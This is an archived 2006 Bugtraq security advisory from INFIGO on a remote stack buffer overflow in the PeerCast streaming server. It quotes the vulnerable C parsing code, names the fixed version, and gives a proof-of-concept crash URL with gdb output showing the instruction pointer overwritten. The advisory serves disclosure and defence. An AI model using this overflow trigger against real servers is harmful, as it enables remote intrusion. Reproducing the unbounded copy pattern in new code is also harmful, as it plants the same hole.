lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060309113643.14530.qmail@mail.avalon.lu>
Date: Thu, 09 Mar 2006 12:36:43 +0100
From: "infocus" <infocus@...igo.hr>
To: bugtraq@...urityfocus.com
Subject: INFIGO-2006-03-01: PeerCast streaming server remote buffer
  overflow



		INFIGO IS Security Advisory #INFIGO-2006-03-01
			http://www.infigo.hr/ 

 

Title: PeerCast streaming server remote buffer overflow
Advisory ID: INFIGO-2006-03-01
Date: 2006-03-08
Advisory URL: http://www.infigo.hr/in_focus/INFIGO-2006-03-01
Impact: Remote code execution
Risk Level: High
Vulnerability Type: Remote and local
Vendors Status: Vendor was first contacted on 7th March 2006. 

 

==[ Overview 

PeerCast is a simple, free way to listen to radio and watch video on the
Internet. It uses P2P technology to let anyone become a broadcaster
without the costs of traditional streaming. This means you get to hear and
watch stations not normally found on commercially funded sites.
PeerCast is available for Linux, Windows and MacOS platforms.
More information can be found on http://www.peercast.org. 

 

==[ Vulnerability 

After short research, high-risk vulnerability was discovered in PeerCast
Streaming server. Unauthenticated remote user can send specially crafted
request to the HTTP server that will cause stack overflow, what can be
easily exploited for remote code execution. The problem is present in URL
handling code. When user requests special URL on the server (like
'stream'), arguments are processed with procConnectArgs() function. 

Vulnerable code in /code/common/servmgr.cpp
 ----------------------------------------
void ServMgr::procConnectArgs(char *str,ChanInfo &info)
{
	char arg[512];
	char curr[256]; 

	char *args = strstr(str,"?");
	if (args)
		*args++=0; 

	info.initNameID(str); 

	if (args)
	{ 

		while (args=nextCGIarg(args,curr,arg))
		{
		...
		...
		...
 ---------------------------------------- 

Function procConnectArgs() will process arguments (char *str) passed to
the server script. Both buffers (arg[512] and curr[256]) allocated on the
stack can be overflowed inside of nextCGIarg() function in while() loop if
too long string is passed after '?' character in URL. 

Vulnerable code in /code/common/servhs.cpp:
 -------------------------------------------
char *nextCGIarg(char *cp, char *cmd, char *arg)
{
	if (!*cp)
		return NULL; 

	// fetch command
	while (*cp)
	{
		char c = *cp++;
		if (c == '=')
			break;
		else
			*cmd++ = c;
	}
	*cmd = 0; 

	// fetch arg
	while (*cp)
	{
		char c = *cp++;
		if (c == '&')
			break;
		else
			*arg++ = c;
	}
	*arg = 0; 

	return cp;
}
 ---------------------------------------- 

 

==[ Affected Version 

PeerCast v0.1215 and lower. 

 

==[ Fix 

Upgrade to PeerCast v0.1217 

 

==[ PoC Exploit 

URL:
http://localhost:7144/stream/?AAAAAAAAAAAAAAAAAAAAAAA....(800) 

gdb output...
[Switching to Thread 180236 (LWP 4526)]
0x41414141 in ?? ()
(gdb) i r
eax            0x0      0
ecx            0x74     116
edx            0x741c9f20       1948032800
ebx            0x4011fff4       1074921460
esp            0xbe3f9e84       0xbe3f9e84
ebp            0x41414141       0x41414141
esi            0x41414141       1094795585
edi            0x41414141       1094795585
eip            0x41414141       0x41414141
eflags         0x210246 2163270
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x0      0
(gdb) 

 

==[ Credits 

Vulnerability discovered by Leon Juranic <leon.juranic@...igo.hr>. 

 

==[ Contact 

INFIGO IS 

Web: http://www.infigo.hr
E-mail: infocus@...igo.hr


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ